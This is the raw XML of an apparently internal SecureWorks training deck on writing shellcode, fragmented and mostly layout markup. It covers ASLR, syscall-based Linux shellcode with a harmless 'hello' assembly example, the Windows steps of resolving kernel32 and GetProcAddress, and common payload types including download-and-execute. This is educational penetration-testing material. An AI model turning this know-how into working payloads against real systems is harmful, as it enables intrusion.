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58"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId59"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="391" r:id="rId5"/>
    <p:sldId id="434" r:id="rId6"/>
    <p:sldId id="435" r:id="rId7"/>
    <p:sldId id="438" r:id="rId8"/>
    <p:sldId id="436" r:id="rId9"/>
    <p:sldId id="445" r:id="rId10"/>
    <p:sldId id="437" r:id="rId11"/>
    <p:sldId id="439" r:id="rId12"/>
    <p:sldId id="442" r:id="rId13"/>
    <p:sldId id="441" r:id="rId14"/>
    <p:sldId id="440" r:id="rId15"/>
    <p:sldId id="443" r:id="rId16"/>
    <p:sldId id="392" r:id="rId17"/>
    <p:sldId id="398" r:id="rId18"/>
    <p:sldId id="399" r:id="rId19"/>
    <p:sldId id="400" r:id="rId20"/>
    <p:sldId id="393" r:id="rId21"/>
    <p:sldId id="364" r:id="rId22"/>
    <p:sldId id="403" r:id="rId23"/>
    <p:sldId id="404" r:id="rId24"/>
    <p:sldId id="405" r:id="rId25"/>
    <p:sldId id="406" r:id="rId26"/>
    <p:sldId id="407" r:id="rId27"/>
    <p:sldId id="408" r:id="rId28"/>
    <p:sldId id="422" r:id="rId29"/>
    <p:sldId id="409" r:id="rId30"/>
    <p:sldId id="410" r:id="rId31"/>
    <p:sldId id="411" r:id="rId32"/>
    <p:sldId id="412" r:id="rId33"/>
    <p:sldId id="413" r:id="rId34"/>
    <p:sldId id="416" r:id="rId35"/>
    <p:sldId id="417" r:id="rId36"/>
    <p:sldId id="418" r:id="rId37"/>
    <p:sldId id="419" r:id="rId38"/>
    <p:sldId id="420" r:id="rId39"/>
    <p:sldId id="421" r:id="rId40"/>
    <p:sldId id="444" r:id="rId41"/>
    <p:sldId id="446" r:id="rId42"/>
    <p:sldId id="450" r:id="rId43"/>
    <p:sldId id="452" r:id="rId44"/>
    <p:sldId id="451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448" r:id="rId54"/>
    <p:sldId id="447" r:id="rId55"/>
    <p:sldId id="449" r:id="rId56"/>
    <p:sldId id="292" r:id="rId57"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="7010400" cy="92964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>
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="5577">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3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nut Popescu" initials="IP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AAAAAA"/>
    <a:srgbClr val="0085C3"/>
    <a:srgbClr val="0087CC"/>
    <a:srgbClr val="E31837"/>
    <a:srgbClr val="CE1126"/>
    <a:srgbClr val="C82B67"/>
    <a:srgbClr val="74CAC7"/>
    <a:srgbClr val="6E258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6376" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="183" d="100"/>
          <a:sy n="183" d="100"/>
        </p:scale>
        <p:origin x="280" y="176"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2818"/>
        <p:guide pos="5577"/>
        <p:guide pos="186"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="9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06" y="3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tags" Target="tags/tag1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId62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103360"/>
            <a:ext cx="70104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103360"/>
            <a:ext cx="70104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hutcherson\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\KLC5BGKJ\iStock_000076994993_Full_rev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nip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2658836" y="-2658836"/>
            <a:ext cx="3826328" cy="9144002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25780" y="746125"/>
            <a:ext cx="7521575" cy="14179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4400" dirty="0" smtClean="0"/>
              <a:t>Edit Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="4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286000"/>
            <a:ext cx="4846638" cy="1028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Subtitle/Author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264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Divider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Y:\Images\Stock Photos\Getty Royalty-free Website ONLY\GettyImages-476804951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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-7201" y="-7201"/>
            <a:ext cx="9151201" cy="498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nip Single Corner Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4720999" y="-444273"/>
            <a:ext cx="3369129" cy="5476875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8788" y="1013460"/>
            <a:ext cx="4273550" cy="1951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Divider Slide Title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9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776131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te Blue Solid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7048800" y="4622400"/>
            <a:ext cx="1936800" cy="30850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4000" cy="493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4340" y="1748271"/>
            <a:ext cx="6850901" cy="149579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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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967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ue Solid Divider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7048800" y="4622400"/>
            <a:ext cx="1936800" cy="308501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00206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4000" cy="493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23853"/>
            <a:ext cx="6850901" cy="1495794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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42162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olid Divi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621"/>
            <a:ext cx="9144000" cy="4923280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7048800" y="4622400"/>
            <a:ext cx="1936800" cy="308501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49580" y="1748271"/>
            <a:ext cx="6850901" cy="1495794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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0211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Solid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7048800" y="4622400"/>
            <a:ext cx="1936800" cy="308501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"/>
            <a:ext cx="9144000" cy="4930901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03860" y="1748271"/>
            <a:ext cx="6850901" cy="1495794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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13526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Blue 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945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66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Blue Title Only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945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335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Blue Title w/Subhead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945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31459304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Blue Single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945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7780"/>
            <a:ext cx="7924386" cy="31927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5192678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Blue 2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945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/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="13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Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="14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39395316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31748" name="Picture 4" descr="\\nfs-atl\secureworks\_PUBLIC_\Marketing\Graphics\Logos\Dell SecureWorks\Dell_SecureWorks_logo_sans_White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2861" y="4537709"/>
            <a:ext cx="11795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jhutcherson\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\KLC5BGKJ\iStock_000049750428_Full_rev (2)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342" y="0"/>
            <a:ext cx="9149341" cy="4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nip Single Corner Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1002846" y="-157843"/>
            <a:ext cx="2971800" cy="4996543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1219200"/>
            <a:ext cx="4273550" cy="1951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Divider Slide Title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369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953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9777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Only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5786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850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w/Subhead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6898078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One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5786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7780"/>
            <a:ext cx="7924386" cy="31927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38644754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2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/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="13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Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="14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41087959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Gray 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839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Gray Title Only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22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Gray Title w/Subhead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83176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Gray Single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7780"/>
            <a:ext cx="7924386" cy="31927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5792986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Gray 2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945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/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="13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Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="14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86253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Y:\Website\2015 Website Rebuild\Imagery\Stock Originals\iStock_000062713222_Medium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4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nip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1012371" y="-157843"/>
            <a:ext cx="2971800" cy="4996543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1219200"/>
            <a:ext cx="4273550" cy="1951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Divider Slide Title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93344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964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Only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888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itle w/Subhead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1512090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One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7780"/>
            <a:ext cx="7924386" cy="31927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18153122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Two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accent5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/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="13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Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="14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40599335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Blank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0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584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Title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5786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Title w/Subhead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27382196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One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7780"/>
            <a:ext cx="7924386" cy="319278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42852474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 Two Column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4000" cy="838200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3704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="-1834"/>
            <a:ext cx="9144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/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="13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Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="14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255270" y="243840"/>
            <a:ext cx="7930595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845185"/>
            <a:ext cx="7934325" cy="366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val="3919476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Y:\Images\Stock Photos\Getty Royalty-free Website ONLY\GettyImages-453535405_medium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nip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1012371" y="-157843"/>
            <a:ext cx="2971800" cy="4996543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1219200"/>
            <a:ext cx="4273550" cy="1951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Divider Slide Title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966818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te Gray Solid Divider"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7048800" y="4622400"/>
            <a:ext cx="1936800" cy="308501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C:\Users\jhutcherson\Pictures\Untitled-4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1"/>
            <a:ext cx="9144000" cy="49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41960" y="1740651"/>
            <a:ext cx="6850901" cy="1495794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AAAAAA">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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25278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Y:\Images\Stock Photos\Getty Royalty-free Website ONLY\iStock_000068245819_Large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497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nip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1012371" y="-157843"/>
            <a:ext cx="2971800" cy="4996543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5275" y="1219200"/>
            <a:ext cx="4273550" cy="1951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Divider Slide Title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9690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jhutcherson\Documents\Logos\SWRX - Logo - White\png\logo_SWRX_white_400x120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375076"/>
            <a:ext cx="18288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nip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1012371" y="-157843"/>
            <a:ext cx="2971800" cy="4996543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098" name="Picture 2" descr="Y:\Website\2015 Website Rebuild\Imagery\Stock Originals\iStock_000063280745_Medium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1"/>
            <a:ext cx="9144002" cy="497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nip Single Corner Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4720999" y="-444273"/>
            <a:ext cx="3369129" cy="5476875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8788" y="1013460"/>
            <a:ext cx="4273550" cy="1951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Divider Slide Title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0187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Y:\Images\Stock Photos\Getty Royalty-free Website ONLY\GettyImages-482178901_medium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49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nip Single Corner Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1012371" y="-157843"/>
            <a:ext cx="2971800" cy="4996543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275" y="1219200"/>
            <a:ext cx="4273550" cy="1951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Divider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50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Y:\Images\Stock Photos\Getty Royalty-free Website ONLY\GettyImages-508065613_medium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49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nip Single Corner Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4720999" y="-444273"/>
            <a:ext cx="3369129" cy="5476875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8788" y="1013460"/>
            <a:ext cx="4273550" cy="1951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Divider Slide Title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0431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Y:\Images\Stock Photos\Getty Royalty-free Website ONLY\iStock_000055748222_Large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2" cy="49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nip Single Corner Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4720999" y="-444273"/>
            <a:ext cx="3369129" cy="5476875"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="82000"/>
            </a:schemeClr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68788" y="1013460"/>
            <a:ext cx="4273550" cy="19510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Divider Slide Title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4379518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9846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Relationship Id="rId4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956556"/>
            <a:ext cx="9144000" cy="186944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AAAAAA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70620" y="4738004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11/9/16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11/9/16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6" name="fc" descr="Classification: //SecureWorks/Restricted - Internal Use Only:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="4956556"/>
            <a:ext cx="9144000" cy="21698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b="0" i="0" u="none" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="arial unicode ms" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Classification: //SecureWorks/Restricted - Internal Use Only:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1F497D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675370" y="4668281"/>
            <a:ext cx="0" cy="228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76" y="4475916"/>
            <a:ext cx="1837943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92" r:id="rId1"/>
    <p:sldLayoutId id="2147484366" r:id="rId2"/>
    <p:sldLayoutId id="2147484394" r:id="rId3"/>
    <p:sldLayoutId id="2147484397" r:id="rId4"/>
    <p:sldLayoutId id="2147484400" r:id="rId5"/>
    <p:sldLayoutId id="2147484393" r:id="rId6"/>
    <p:sldLayoutId id="2147484396" r:id="rId7"/>
    <p:sldLayoutId id="2147484398" r:id="rId8"/>
    <p:sldLayoutId id="2147484399" r:id="rId9"/>
    <p:sldLayoutId id="2147484401" r:id="rId10"/>
    <p:sldLayoutId id="2147484403" r:id="rId11"/>
    <p:sldLayoutId id="2147484406" r:id="rId12"/>
    <p:sldLayoutId id="2147484412" r:id="rId13"/>
    <p:sldLayoutId id="2147484415" r:id="rId14"/>
    <p:sldLayoutId id="2147484419" r:id="rId15"/>
    <p:sldLayoutId id="2147484422" r:id="rId16"/>
    <p:sldLayoutId id="2147484421" r:id="rId17"/>
    <p:sldLayoutId id="2147484410" r:id="rId18"/>
    <p:sldLayoutId id="2147484420" r:id="rId19"/>
    <p:sldLayoutId id="2147484414" r:id="rId20"/>
    <p:sldLayoutId id="2147484424" r:id="rId21"/>
    <p:sldLayoutId id="2147484425" r:id="rId22"/>
    <p:sldLayoutId id="2147484426" r:id="rId23"/>
    <p:sldLayoutId id="2147484427" r:id="rId24"/>
    <p:sldLayoutId id="2147484411" r:id="rId25"/>
    <p:sldLayoutId id="2147484428" r:id="rId26"/>
    <p:sldLayoutId id="2147484429" r:id="rId27"/>
    <p:sldLayoutId id="2147484430" r:id="rId28"/>
    <p:sldLayoutId id="2147484431" r:id="rId29"/>
    <p:sldLayoutId id="2147484413" r:id="rId30"/>
    <p:sldLayoutId id="2147484432" r:id="rId31"/>
    <p:sldLayoutId id="2147484433" r:id="rId32"/>
    <p:sldLayoutId id="2147484434" r:id="rId33"/>
    <p:sldLayoutId id="2147484435" r:id="rId34"/>
    <p:sldLayoutId id="2147484416" r:id="rId35"/>
    <p:sldLayoutId id="2147484436" r:id="rId36"/>
    <p:sldLayoutId id="2147484437" r:id="rId37"/>
    <p:sldLayoutId id="2147484438" r:id="rId38"/>
    <p:sldLayoutId id="2147484439" r:id="rId39"/>
    <p:sldLayoutId id="2147484440" r:id="rId40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Sans For Dell" panose="02000000000000000000" pitchFamily="2" charset="0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chemeClr val="bg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000" baseline="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6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hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/ff818516(v=vs.85).aspx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desktop/dd374081(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/dd374089(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout33.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/dd317752(v=vs.85).aspx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hyperlink" Target="https://github.com/NytroRST/ShellcodeCompiler" TargetMode="External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hyperlink" Target="https://nickharbour.wordpress.com/2010/07/01/writing-shellcode-with-a-c-compiler/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/articles/windows-syscall-shellcode" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.didierstevens.com/programs/shellcode/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.msreverseengineering.com/blog/2016/11/8/synesthesia-modern-shellcode-synthesis-ekoparty-2016-talk" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://defuse.ca/online-x86-assembler.htm" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/shellcode/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Shellcode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securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Sockets-Shellcode-Porting-Coding-Professionals/dp/1597490059" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hick.org/code/skape/papers/win32-shellcode.pdf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/62/7.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/57/15.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mcdermottcybersecurity.com/articles/windows-x64-shellcode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hyperlink" Target="http://www.nasm.u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5780" y="581235"/>
            <a:ext cx="7521575" cy="14179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Windows shellcodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To be continued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3400" y="2286000"/>
            <a:ext cx="6736830" cy="1028700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Ionut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Popescu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Senior Penetration Tester @ SecureWorks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3036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structure of a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46" y="942321"/>
            <a:ext cx="5394592" cy="35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595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ASLR - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address space layout randomization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" y="1081924"/>
            <a:ext cx="2906458" cy="3596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1018" y="1598456"/>
            <a:ext cx="5493379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Address space layout randomization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(ASLR) is a computer security technique involved in protection from buffer overflow attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="180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endParaRPr lang="en-US" sz="180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order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.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9763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 limitations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270" y="1256428"/>
            <a:ext cx="75555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- Difficult (may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be really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complicated to write your own shellcode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- NULL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free (may not contain a NULL character – most common)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- Small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size (may have a limited space to run)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- Alphanumeric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(may need to be alphanumeric)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- Detection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(may be detected by antivirus or IDS/IPS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Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)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47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Shellcodes on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210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Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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syscalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Execve sysc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16" y="2600177"/>
            <a:ext cx="3599278" cy="1912116"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Calling sysc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0650" y="2600177"/>
            <a:ext cx="3163181" cy="19058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660" y="883920"/>
            <a:ext cx="9015339" cy="180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0x80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is the assembly language instruction that is used to invoke system calls in Linux on x86 (i.e., Intel-compatible) processors. </a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1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	Each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process starts out in user mode. When a process makes a system call, it causes the CPU to switch temporarily into kernel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mode. When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the kernel has satisfied the process's request, it restores the process to user mode.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8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379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Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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syscalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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o-RO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examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Linux syscall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4041" y="883920"/>
            <a:ext cx="5696243" cy="3521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472353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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Syscall – Kernel API (interface between usermode and kernelmode)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11482695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270" y="217714"/>
            <a:ext cx="7930595" cy="640080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1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270" y="1158844"/>
            <a:ext cx="50221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jmp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short ender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400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starter: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;clean up the registers</a:t>
            </a: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ebx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ebx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edx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edx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ecx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ecx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400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mov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al, 4       ;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syscall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write</a:t>
            </a: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mov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bl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1       ;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is 1</a:t>
            </a:r>
          </a:p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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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ecx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;get the address of the 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       ;string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from the stack</a:t>
            </a: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mov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dl, 5       ;length of the string</a:t>
            </a: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0x80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3693" y="1697452"/>
            <a:ext cx="42203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eax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mov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al, 1   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exit the shellcode</a:t>
            </a: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ebx,ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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ro-RO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0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty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ender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call starter ;put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the address of </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2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        ;the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string on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1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db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'hello'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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636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shellcodes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7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967" y="1066800"/>
            <a:ext cx="7315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Find kernel32.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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Find GetProcAddress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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Find LoadLibrary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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Load DLLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Call</a:t>
            </a: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o-RO" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>functions</a:t>
            </a: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o-RO" sz="2000" dirty="0" err="1" smtClean="0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o-RO" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DLLs</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO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ro-RO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/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Common shellcodes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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calc.exe (WinExec)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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Download and execute (URLDownloadToFileA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
